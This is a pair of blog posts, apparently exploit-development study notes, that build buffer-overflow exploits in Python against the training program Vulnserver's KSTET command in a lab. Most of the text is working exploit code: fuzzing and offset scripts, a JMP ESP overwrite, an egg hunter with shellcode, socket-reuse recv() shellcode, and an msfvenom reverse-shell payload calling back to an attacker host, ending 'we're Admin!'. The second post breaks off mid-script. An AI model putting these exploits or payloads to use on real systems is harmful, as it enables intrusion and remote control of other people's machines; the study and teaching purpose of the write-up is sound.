Sevro Security
Vulnserver KSTET Egg Hunter with Python3

During my OSCP study, I went down the Buffer Overflow rabbit hole and found myself going a bit further than needed. I found out I really freaking like binary exploitation! Today, I am going to talk about Egg Hunters. Egg Hunters are used when we don’t have enough room after the EIP overwrite to execute anything worth our time (i.e., a shell, system command, etc.). An Egg Hunter is a small set of bytecode that is effectively a loop looking for a pre-defined string (that we define) in memory and when it finds that string, it will execute whatever is after. The code after our pre-defined string being our exploitation bytecode.

To put this into context, let’s say we have two FTP parameters that store data on the stack (USER, PASS). Let’s say that the PASS parameter is susceptible to a BOF attack and we can easily gain control of EIP. However, we only have maybe 20-30 bytes after the EIP overwrite to store any bytecode and that’s just not enough space to do anything useful. In comes the USER parameter. It’s not susceptible to a Buffer Overflow necessarily however, it might give us enough buffer space to store our shellcode. In this case, we would have a two-stage execution where we conduct the following:

1. Connect to the FTP server.
2. Send our Reverse Shell Payload in the USER parameter.
3. Send our Egghunter plus the EIP Overwrite to JMP ESP in the PASS Parameter.

Okay, let’s dig in.

[hr]

Setup:

Here is the setup that is being used during the entire write-up:

• [Attacker] Kali 2018.4 x86_64
• [Victim] Windows XP SP3 Build 2600
• [Vulnerable Binary] VulnServer
• [Language] Python 3.6.6
• [Debugger] Immunity
  • We will also use the Mona Script with Immunity.

Some of you might be asking why Python 3? That’s fair since the python 3 socket library is different than the 2.7 library and that’s really why I am using it, to learn. The biggest difference you will note is that when you send your data to the server, it has to be in a byte object and not a string object whereas 2.7 doesn’t give a shit.

[hr]

Fuzzing:

Our first goal is to identify which parameters are vulnerable but since VulnServer has a few, we’re going to start with the KSTET Parameter. In order to get a better idea on how many parameters there are, below is the available listing.

We send 1,000 A’s (\x41) with the KSTET parameter and we see we overflow the buffer.

import socket
import struct
import time

IP = '192.168.56.130'
PORT = 9999

# Connect to the Server:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP,PORT))

# Send data to the KSTET Parameter:
buf = b""
buf += b"A"*1000

s.send(b"KSTET %s \r\n" % buf)

s.close()

[hr]

Controlling EIP:

Just like we do with any BOF, let’s get the offset of EIP so we can start the process of controlling EIP.

• pattern_create.rb -l 1000

import socket
import struct
import time

IP = '192.168.56.130'
PORT = 9999

# Connect to the Server:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP,PORT))

# Send data to the KSTET Parameter:
pattern = (b'''Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B''')

buf = b""
buf += pattern

s.send(b"KSTET %s \r\n" % buf)

s.close()

We then verify the Immunity EIP value.

And use the pattern_offset to file the true offset of EIP:

• pattern_offset.rb -q 63413363
  • Offset = 70

Now, let’s send a new payload to do two different things. The first goal is to verify we do have control of EIP by writing all B’s into EIP and the next goal is to check how much space we have after the EIP overwrite to place our shellcode. We do this by sending 600 C’s. The new code looks like this:

import socket
import struct
import time

IP = '192.168.56.130'
PORT = 9999
EIP_OFFSET = 70

# Connect to the Server:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP,PORT))

# Send data to the KSTET Parameter:
buf = b""
buf += b"A"*EIP_OFFSET
buf += b"B"*4
buf += b"C"*600

s.send(b"KSTET %s \r\n" % buf)

s.close()

Immunity shows that yes, we have control of EIP as there are now 4 B’s (\x42) residing in the EIP register, however, we only have 28 Bytes of space after the EIP overwrite. As stated in the beginning of this tutorial, that’s just not enough, we need more space.

[hr]

Determine Bad Characters:

Before we start digging into other parameters we can place our shellcode into, let’s determine the bad characters. Here is our new code:

import socket
import struct
import time

IP = '192.168.56.130'
PORT = 9999
EIP_OFFSET = 70

# Connect to the Server:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP,PORT))

# Bad Characters:
bad_chars = [0x00,0x0a]
chars = b""
for i in range(0x00,0xFF+1):
    if i not in bad_chars:
        chars += bytes([i])
with open("bad_chars.bin", "wb") as f:
    f.write(chars)

# Send data to the KSTET Parameter:
buf = b""
buf += chars
s.send(b"KSTET %s \r\n" % buf)

s.close()

In looking at the bad characters, it’s apparent that we don’t have enough space to review the whole array of bytes. As such, I conducted the overflow in three separate operations:

• Operation 1: 0x00 – 0x60
• Operation 2: 0x60 – 0xC0
• Operation 3: 0xC0 – 0xFF

Bad Characters were determined to be: 0x00, 0x0A, 0x0D

[hr]

Finding JMP ESP:

Since I am using VISTA as the victim, there will be little to no protection (DEP,ASLR). That means we can just ask mona to look for the JMP ESP opcode (\xFF\xE4) and choose any of the results.

I’m just going to use the first result (0x7C874F13). To make sure we have full control and are able to execute the JMP ESP instruction, let’s restart the vulnserver in Immunity and set a break point at the address. Here is the new code:

import socket
import struct
import time

IP = '192.168.56.130'
PORT = 9999
EIP_OFFSET = 70
JMP_ESP = struct.pack("I", 0x7C874F13)          # FFE4  JMP ESP
#JMP_ESP = b"\x13\x4F\x87\x7C"
#print(JMP_ESP)

# Connect to the Server:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP,PORT))

# Send data to the KSTET Parameter:
buf = b""
buf += b"A" * EIP_OFFSET
buf += JMP_ESP
s.send(b"KSTET %s \r\n" % buf)

s.close()

And we have a successful JMP ESP.

[hr]

Building the Egghunter:

Okay, we know that we only have about 28 Bytes after the EIP overflow to work with. That wont fit our egghunter byte code. In that case, we will inject our egghunter before the EIP overwrite and then add the instruction JMP SHORT -48 after the EIP overwrite to jump back to our egghunter. What we need to figure out now is which parameter can successfully take an input of about 350-450 bytes of data and not throw an exception or overflow the buffer. Let’s build a fuzzing script to do that for us.

import socket
import struct
import time

IP = '192.168.56.130'
PORT = 9999
EIP_OFFSET = 70
JMP_ESP = struct.pack("I", 0x7C874F13)          # FFE4  JMP ESP
#JMP_ESP = b"\x13\x4F\x87\x7C"
#print(JMP_ESP)

# Connect to the Server:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP,PORT))

# Send data to the KSTET Parameter:
parameters = [b"STATS",b"RTIME",b"LTIME",b"SRUN",b"TRUN",b"GMON",b"GDOG",b"GTER",b"HTER",b"LTER",b"KSTAN"]

for i in range(0,len(parameters)):
    print("[+] Sending %s"% str(parameters[i]))
    buf = b""
    buf += parameters[i]
    buf += b" "
    buf += b"A" * 500
    s.send(b"%s\r\n" % buf)
    time.sleep(1)

Right away, we find that the GTER parameter causes an overflow. Let’s remove that and test again.  After the second test, we see that the rest of the parameters ran successfully without causing an overflow or an exception. This means that maybe, we can store our shellcode in one of these parameters and have the egghunter find it in memory. Now that we know the parameters, let’s add this to our script and build a two payload program.

To generate the egghunter code, we will use mona.

!mona egg -cpb "\x00\x0a\x0d" -t loki

The image above shows our shellcode. The generated shellcode will also be listed in an egghunter.txt document located at C:/Program Files/Immunity Inc/Immunity Debugger.

Now let’s generate some shellcode. For testing, I am just going to send the command calc.exe. The syntax to generate this shellcode is:

msfvenom -p windows/exec cmd=calc.exe -b '\x00\x0a\x0d' -f c

Our new script looks like this:

import socket
import struct
import time

IP = '192.168.56.130'
PORT = 9999
EIP_OFFSET = 70
JMP_ESP = struct.pack("I", 0x7C874F13)          # FFE4  JMP ESP
#JMP_ESP = b"\x13\x4F\x87\x7C"
#print(JMP_ESP)

# Connect to the Server:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP,PORT))

# STAGE 1: Send The Shellcode
parameters = [b"STATS",b"RTIME",b"LTIME",b"SRUN",b"TRUN",b"GMON",b"GDOG",b"HTER",b"LTER",b"KSTAN"]

shellcode = (b"\xda\xce\xba\x5b\x24\x91\xbf\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1"
"\x31\x83\xef\xfc\x31\x57\x14\x03\x57\x4f\xc6\x64\x43\x87\x84"
"\x87\xbc\x57\xe9\x0e\x59\x66\x29\x74\x29\xd8\x99\xfe\x7f\xd4"
"\x52\x52\x94\x6f\x16\x7b\x9b\xd8\x9d\x5d\x92\xd9\x8e\x9e\xb5"
"\x59\xcd\xf2\x15\x60\x1e\x07\x57\xa5\x43\xea\x05\x7e\x0f\x59"
"\xba\x0b\x45\x62\x31\x47\x4b\xe2\xa6\x1f\x6a\xc3\x78\x14\x35"
"\xc3\x7b\xf9\x4d\x4a\x64\x1e\x6b\x04\x1f\xd4\x07\x97\xc9\x25"
"\xe7\x34\x34\x8a\x1a\x44\x70\x2c\xc5\x33\x88\x4f\x78\x44\x4f"
"\x32\xa6\xc1\x54\x94\x2d\x71\xb1\x25\xe1\xe4\x32\x29\x4e\x62"
"\x1c\x2d\x51\xa7\x16\x49\xda\x46\xf9\xd8\x98\x6c\xdd\x81\x7b"
"\x0c\x44\x6f\x2d\x31\x96\xd0\x92\x97\xdc\xfc\xc7\xa5\xbe\x6a"
"\x19\x3b\xc5\xd8\x19\x43\xc6\x4c\x72\x72\x4d\x03\x05\x8b\x84"
"\x60\xf9\xc1\x85\xc0\x92\x8f\x5f\x51\xff\x2f\x8a\x95\x06\xac"
"\x3f\x65\xfd\xac\x35\x60\xb9\x6a\xa5\x18\xd2\x1e\xc9\x8f\xd3"
"\x0a\xaa\x4e\x40\xd6\x03\xf5\xe0\x7d\x5c")

for i in range(0,len(parameters)):
    s.send(parameters[i] + b" " + b"lokiloki" + shellcode + b"\r\n")
    print(s.recv(1024))
    time.sleep(1)
s.close()

# STAGE 2: Send the Egghunter Code in the Overflow
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((IP,PORT))

egghunter = b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += b"\xef\xb8\x6c\x6f\x6b\x69\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"


buf = b"\x90"*30
buf += egghunter
buf += b"\x90" * ((EIP_OFFSET-len(egghunter)-30))
buf += JMP_ESP
buf += b"\xEB\xCE"          # Jump Back 50 Bytes for egghunter shellcode
buf += b"C" * 200
s.send(b"KSTET " + buf + b"\r\n")
print(s.recv(1024))

s.close()

The script is broken down into two different stages. Each stage generates a new socket call to the vulnerable server, this is important. Also, take note to the Stage 1 s.send(). You can see I have added the b"lokiloki" to it. This is the string that the egghunter is going to look for in memory. When you generate the egg hunter with mona and read the .txt file it generates, it will explicitly tell you what text to put there. Let’s break down what is happening at each stage.

Stage 1:

In stage one, we connect to the vulnerable server and start a for loop. The for loop loops through the parameters array using each value to send the shellcode payload. We don’t know which parameter will truly hold our shellcode so hell, why not try them all! And that’s effectively what we are doing here. It’s also important to note that a 1-second time delay is necessary at the end of each loop iteration. Without that one second time delay, we outpace the server and never give it a chance to take action on the command we just sent.

Stage 2:

Stage two is where the real magic happens. We create a new socket and connect to the vulnerable server once again. This time, we send the egghunter between two sets of NOP’s, overwrite the EIP register with our JMP ESP instruction memory address, and then we have a custom instruction we wrote (\xEB\xCE) that’s loaded into the stack per our overflow and executed after the JMP ESP instruction. Let’s take a look at this instruction and why we have it in our payload.

Our egghunter shellcode is still a bit too big to be loaded after the JMP ESP. However, we know we have a total of 70 bytes before the EIP overwrite and therefore we can use that space to store our egghunter and then jump back to it with a custom instruction. In this case, I want to jump back 48 Bytes to the middle of our first NOP sled. We can use the nasm_shell.rb to give us the correct opcode to use as seen in the image below.

Let’s put a breakpoint in Immunity at our JMP ESP and step through what is going on here.

When we hit our breakpoint we jumped forward 1 instruction (F7) to get to our JMP SHORT instruction highlighted in blue in the leftmost image. When we move forward again (1 instruction) we see we jump to a lower memory address putting us 4 NOP Bytes before our egghunter. Perfect!

The egghunter is going to start a loop looking for the lokiloki string in memory in an attempt to find our shellcode and execute it. If we let the rest of the code run it’s course, we get calc.exe to pop and we know we have full code execution!

[hr]

Reverse Shell:

Now that we have a fully working exploit, let’s resplace the calc.exe shellcode with a reverse shell and see what happens.

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.136 LPORT=443 -b'\x00\x0a\x0d' -f c

import socket
import struct
import time

IP = '192.168.56.130'
PORT = 9999
EIP_OFFSET = 70
JMP_ESP = struct.pack("I", 0x7C874F13)          # FFE4  JMP ESP
#JMP_ESP = b"\x13\x4F\x87\x7C"
#print(JMP_ESP)

# Connect to the Server:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP,PORT))

# STAGE 1: Send The Shellcode
parameters = [b"STATS",b"RTIME",b"LTIME",b"SRUN",b"TRUN",b"GMON",b"GDOG",b"HTER",b"LTER",b"KSTAN"]

shellcode = (b"\xda\xc7\xd9\x74\x24\xf4\xb8\xca\x84\x12\x1c\x5a\x33\xc9\xb1"
"\x52\x31\x42\x17\x83\xc2\x04\x03\x88\x97\xf0\xe9\xf0\x70\x76"
"\x11\x08\x81\x17\x9b\xed\xb0\x17\xff\x66\xe2\xa7\x8b\x2a\x0f"
"\x43\xd9\xde\x84\x21\xf6\xd1\x2d\x8f\x20\xdc\xae\xbc\x11\x7f"
"\x2d\xbf\x45\x5f\x0c\x70\x98\x9e\x49\x6d\x51\xf2\x02\xf9\xc4"
"\xe2\x27\xb7\xd4\x89\x74\x59\x5d\x6e\xcc\x58\x4c\x21\x46\x03"
"\x4e\xc0\x8b\x3f\xc7\xda\xc8\x7a\x91\x51\x3a\xf0\x20\xb3\x72"
"\xf9\x8f\xfa\xba\x08\xd1\x3b\x7c\xf3\xa4\x35\x7e\x8e\xbe\x82"
"\xfc\x54\x4a\x10\xa6\x1f\xec\xfc\x56\xf3\x6b\x77\x54\xb8\xf8"
"\xdf\x79\x3f\x2c\x54\x85\xb4\xd3\xba\x0f\x8e\xf7\x1e\x4b\x54"
"\x99\x07\x31\x3b\xa6\x57\x9a\xe4\x02\x1c\x37\xf0\x3e\x7f\x50"
"\x35\x73\x7f\xa0\x51\x04\x0c\x92\xfe\xbe\x9a\x9e\x77\x19\x5d"
"\xe0\xad\xdd\xf1\x1f\x4e\x1e\xd8\xdb\x1a\x4e\x72\xcd\x22\x05"
"\x82\xf2\xf6\x8a\xd2\x5c\xa9\x6a\x82\x1c\x19\x03\xc8\x92\x46"
"\x33\xf3\x78\xef\xde\x0e\xeb\xd0\xb7\x28\x63\xb8\xc5\x48\x72"
"\x82\x43\xae\x1e\xe4\x05\x79\xb7\x9d\x0f\xf1\x26\x61\x9a\x7c"
"\x68\xe9\x29\x81\x27\x1a\x47\x91\xd0\xea\x12\xcb\x77\xf4\x88"
"\x63\x1b\x67\x57\x73\x52\x94\xc0\x24\x33\x6a\x19\xa0\xa9\xd5"
"\xb3\xd6\x33\x83\xfc\x52\xe8\x70\x02\x5b\x7d\xcc\x20\x4b\xbb"
"\xcd\x6c\x3f\x13\x98\x3a\xe9\xd5\x72\x8d\x43\x8c\x29\x47\x03"
"\x49\x02\x58\x55\x56\x4f\x2e\xb9\xe7\x26\x77\xc6\xc8\xae\x7f"
"\xbf\x34\x4f\x7f\x6a\xfd\x7f\xca\x36\x54\xe8\x93\xa3\xe4\x75"
"\x24\x1e\x2a\x80\xa7\xaa\xd3\x77\xb7\xdf\xd6\x3c\x7f\x0c\xab"
"\x2d\xea\x32\x18\x4d\x3f")

for i in range(0,len(parameters)):
    s.send(parameters[i] + b" " + b"lokiloki" + shellcode + b"\r\n")
    print(s.recv(1024))
    time.sleep(1)
s.close()

# STAGE 2: Send the Egghunter Code in the Overflow
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((IP,PORT))

egghunter = b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += b"\xef\xb8\x6c\x6f\x6b\x69\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"


buf = b"\x90"*30
buf += egghunter
buf += b"\x90" * ((EIP_OFFSET-len(egghunter)-30))
buf += JMP_ESP
buf += b"\xEB\xCE"          # Jump Back 50 Bytes for egghunter shellcode
buf += b"C" * 200
s.send(b"KSTET " + buf + b"\r\n")
print(s.recv(1024))

s.close()

And, we’re Admin!

[hr]

Thoughts on Python3:

I decided to use Python3 for this tutorial because I use it for just about everything. That is, with the exception of exploit development. Python 2.7 is my goto for Buffer Overflow development and honestly, I think I am going to keep that the same. The subtle buy annoying nuances of making sure everything was typecast to a bytes object sucked. Many times the objects would be sent oddly and not trigger the right response I was looking for. Python 2.7 allows strings in the s.send() method which, makes things much easier to deal with.

Anyhow, Python3 is still amazing and I will use it as my daily driver, with the exception of BOF exploit development!

Happy Thanksgiving!

Vulnserver KSTET Egg Hunter with Python3
Joshua

Sevro Security
Vulnserver KSTET Socket Re-use

In a previous post, Vulnserver KSTET Egg Hunter, we looked at how we can use an egghunter to obtain code execution within a larger chunk of memory. In this post, we will look at the KSTET Socket re-use WS2_32.dll recv() function and how we can re-use this to pull in a larger chunk of shellcode within a buffer we allocate ourselves. In regards to Vulnserver.exe, the recv() function is used anytime we send data to the socket. The data is then parsed by the server and decides what to do with it.

Prerequisites:

• Vulnserver.exe
• Immunity or Ollydbg – I will be using Immunity
• Mona.py
• Windows VM – I am using a Windows XP Professional host

Resources:

• WS2_32.recv() function
• Two Byte Short Jump Instructions
• Online x86, x86_64 Instruction Assembler/Disassembler

---

I’m going to skip some of the set-up assuming you understand how to attach a debugger to a process or start a process within a debugger. If you don’t, go ahead and read some of my other buffer overflow tutorials.

The Crash

Part of why I decided to build this tutorial us because I am currently studying for the OSCE. As such, we are going to use the Spike Fuzzer (Native in Kali) to fuzz the VulnServer.exe application and just like the egg hunter tutorial, we will be fuzzing the KSTET parameter. Here is our Spike Fuzzing template (kstet.spk):

s_readline();
s_string("KSTET ");
s_string_variable("0");
s_string("\r\n");
s_readline();

The VulnServer listens on port 9999 and is residing at an IP Address: 192.168.5.130. So, our Spike Fuzzer syntax will be:

generic_send_tcp 192.168.5.130 9999 kstet.spk 0 0

During any fuzzing, it’s a good idea to keep a WireShark instance running in the background so you can manually analyze the packets if a crash occurs.

After less than 2 seconds, we have a visible crash that looks to have overwritten EIP and EBP.

Looking at Wireshark we see that the last valid connection contained the following data:

---

Buffer Overflow Standard Steps

This is the repetitive part of any Buffer Overflow:

1. Determine the offset in which we overwrote EIP.
2. Find a JMP ESP Instruction we can use.
3. Overwrite EIP with the JMP ESP address and control the execution flow.

Determine Offset:

We create a standard pattern using the Metasploit Frameworks pattern_create.rb. This generates a unique string n bytes long that is used to determine the actual offset of the overwrite. The syntax for the ruby script is:

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 500

Build a Python proof of concept to crash the application similar to the Spike Fuzzer:

import socket
import struct
import time

IP = "192.168.5.130"
PORT = 9999

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
print(s.recv(2096))

pattern = ("""Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq""")

buf = ""
buf += "KSTET /.:/"
buf += pattern
buf += "\r\n"

s.send(buf)

We send the payload, overwrite EIP with the pattern, and now determine the proper offset

After we have the correct offset, we can build a proof of concept that shows two things:

1. We have control of EIP and therefore have control of code execution
2. How much space after the overwrite we have to play with (i.e. store our shellcode)

import socket
import struct
import time

IP = "192.168.5.130"
PORT = 9999
EIP_OFFSET = 66

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
print(s.recv(2096))

buf = ""
buf += "KSTET /.:/"
buf += "A" * 66
buf += "B" * 4
buf += "C" * 500
buf += "\r\n"

s.send(buf)

We control EIP and we only have 0x10 Bytes of room for shellcode. That’s not enough for anything. However, we have 0x44 Bytes above ESP that we can use to build something useful. In the previous KSTET tutorial, we used this space for an egg-hunter. Now, we are going to build our own shellcode to re-use the WS2_32.recv() function.

Find JMP ESP:

I personally like to use Mona.py with Immunity Debugger to help determine a valid JMP ESP. There are tons of ways to find a proper JMP ESP address, this one just fits my needs.

Verify we have EIP Control:

Set a breakpoint at the JMP ESP address you selected. Amend you python script to include the JMP ESP address and the EIP overwrite and verify you now hit the JMP ESP address and get back to your code (in this case, the C’s).

import socket
import struct
import time

IP = "192.168.5.130"
PORT = 9999
EIP_OFFSET = 66
JMP_ESP = struct.pack("I", 0x625011C7)


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
print(s.recv(2096))

buf = ""
buf += "KSTET /.:/"
buf += "A" * 66
buf += JMP_ESP
buf += "C" * 500
buf += "\r\n"

s.send(buf)

---

A Short Jump

In order to get more room to build our custom shellcode, we need to make a short jump to the top of the A’s. In the start of this tutorial, I posted a link describing the JMP SHORT instructions. Basically, these are two (2) byte instructions that will help us move around in memory without taking up a shit ton of space.

In this case, we want to get to address 0x00B8F9C6. An easy way to build the shellcode is write the instructions directly within Immunity by hitting the space bar and typing in the assembly.

As you can see, from the blue text on the left of the Assembly instructions, our opcode is going to be \xEB\xB8. We can simply add this into our python script and verify we have in-fact jumped backwards to our required address.

import socket
import struct
import time

IP = "192.168.5.130"
PORT = 9999
EIP_OFFSET = 66
JMP_ESP = struct.pack("I", 0x625011C7)


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
print(s.recv(2096))

buf = ""
buf += "KSTET /.:/"
buf += "A" * 66
buf += JMP_ESP
buf += "\xEB\xB8"               # JMP SHORT
buf += "C" * 500
buf += "\r\n"

s.send(buf)

---

WS2_32.recv() Review

Before we dig into writing custom shellcode, let’s analyze what is happening locally when recv() is called in the non-altered code.Let’s also define some terms and parameters that are necessary to fully understand before we understand the exploit.

The recv() function is part of the winsock.h header and takes a total of 4 parameters:

1. SOCKET – This is a Socket Descriptor and defines a valid socket. It’s dynamic and changes each time the binary/exe is run.
2. *buf – A pointer in memory where we want to start storing what is received from the socket connection.
3. len – The size of the buffer in Bytes
4. flags – Will always be set to 0 in our case. We essentially do not use this but need it to complete the function call.

Three (3) of the four (4) parameters can be generated by us, the attacker. We easily make up our own values, pop them onto the stack and have a good ol’ day. But, the SOCKET descriptor is the odd man/woman out. This is set dynamically, by the program. It is, however, set predictably and as such we can analyze a live recv() call in action and find where it’s obtaining the SOCKET descriptor from. Once we know where it comes from, we can dynamically pull that value in with our custom shellcode to make our recv() call as legitimate as the original.

Analyze a Legitimate recv():

In your debugger, start a fresh run of vulnserver.exe and put it into a running state. To make sure the debugger (olly or immunity) has analyzed the code properly, hit CTRL+A. This will tell the debugger to analyze the assembly and point out any objective function calls. With this analyzed, look for the recv() function call.

• 

• 

From left to right, the first picture is where the recv() function is called within the program. The second picture is where we land when the CALL is executed. The address in the second image 0x0040252C is very important as that is that address we will CALL at the very end of our custom shellcode.

Next, let’s place a breakpoint at the CALL shown in the first image (leftmost image), and execute our overflow python script so we can observe the legitimate recv() function call.

When the python script is executed, we hit our breakpoint and can view the recv() parameters cleanly located on the stack for us.

• SOCKET DESCRIPTOR = 0x00000080
• BUFFER START ADDR = 0x003E4AD0
• BUFFER LENGTH = 0x00001000 (4096 Bytes base 10)
• FLAGS = 0x00000000

Again, at this point, we only care where that Socket Descriptor came from. If we set our breakpoint a few instructions above the CALL <JMP.&WS2_32.recv> we find that MOV EAX, DWORD PTR SS:[EBP-420] is responsible for pulling in the Socket Descriptor. Cool, let’s do some basic math:

EBP = 00B8FFB4 and if we calculate: (00B8FFB4 – 420) = 00B8FB94‬.

If we navigate to this address in the debugger, we should find our Socket Descriptor and, we do.

---

Custom Shellcode

Now that we have the location of the Socket Descriptor, we can start to build our custom shellcode to setup the stack for our evil recv() function call. Since the Stack grow from bottom up, we need to build our stack with that in mind starting by adding the FLAG parameter first and the Socket Descriptor last.

The easiest way to build your custom shellcode is simply to do it in the Debugger. Set a breakpoint at your JMP ESP, get to you JMP instruction and start building your shellcode. Below is an example on how I setup my Stack:

recv = ""
recv += "\x83\xEC\x50"                  # SUB ESP, 50
recv += "\x33\xD2"                      # XOR EDX, EDX
recv += "\x52"                          # PUSH EDX (FLAGS = 0)
recv += "\x83\xC2\x04"                  # ADD EDX, 0x4 
recv += "\xC1\xE2\x08"                  # SHL EDX, 8
recv += "\x52"                          # PUSH EDX (BUFFER SIZE = 0x400)
recv += "\x33\xD2"                      # XOR EDX, EDX 
recv += "\xBA\x90\xF8\xF9\xB8"          # MOV EDX, 0xB8F9FB90
recv += "\xC1\xEA\x08"                  # SHR EDX, 8 
recv += "\x52"                          # PUSH EDX (BUFFER LOCATION = 0x00B8F9FB)
recv += "\xB9\x90\x94\xFB\xB8"          # MOV ECX, 0xB8FB9490
recv += "\xC1\xE9\x08"                  # SHR ECX, 8 
recv += "\xFF\x31"                      # PUSH DWORD PTR DS:[ECX] (SOCKET DESCRIPTOR LOADED)
recv += "\xBA\x90\x2C\x25\x40"          # MOV EDX, 0X0040252C
recv += "\xC1\xEA\x08"                  # SHR EDX, 8 (Location of RECV())
recv += "\xFF\xD2"                      # CALL EDX

Let’s go through this step by step:

• Lines 2-3: I found that the stack was not aligned after the second payload was sent. This aligns the stack for our second payload
• Lines 4-5: We XoR the EDX Register by itself to make it 0 (0x00000000) and PUSH it onto the stack. This will serve as our FLAG parameter.
• Lines 6-8: We cannot have a null byte (0x00) in our shellcode so, we add 0x4 to EDX and shift it left by 1 Byte (8-bits) to give us 0x400 This serves as our Buffer Size.
• Lines 9-12: Zero out EDX with XoR, MOV 0xB8F9FB90 into EDX, shift right to get rid of 0x90 and get our 0x00 for a final value of 0x00B8F9FB. This serves as our Buffer Start Address.
• Lines 13-15: Load Socket Descriptor addr. into ECX, PUSH the value of the data located at ECX (denoted as [ECX]not ECX, note the difference). This serves as the Socket Descriptor.
• Lines 16-18: Load the address of WS2_32.recv, that we found when we analyzed the legitimate recv(), into EDX and CALL EDX to complete the function call.

• 

• 

import socket
import struct
import time

IP = "192.168.5.130"
PORT = 9999
EIP_OFFSET = 66
JMP_ESP = struct.pack("I", 0x625011C7)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
print(s.recv(2096))

# WS2_32.recv() Stack Setup
recv = ""
recv += "\x83\xEC\x50"                  # SUB ESP, 50
recv += "\x33\xD2"                      # XOR EDX, EDX
recv += "\x52"                          # PUSH EDX (FLAGS = 0)
recv += "\x83\xC2\x04"                  # ADD EDX, 0x4 
recv += "\xC1\xE2\x08"                  # SHL EDX, 8
recv += "\x52"                          # PUSH EDX (BUFFER SIZE = 0x400)
recv += "\x33\xD2"                      # XOR EDX, EDX 
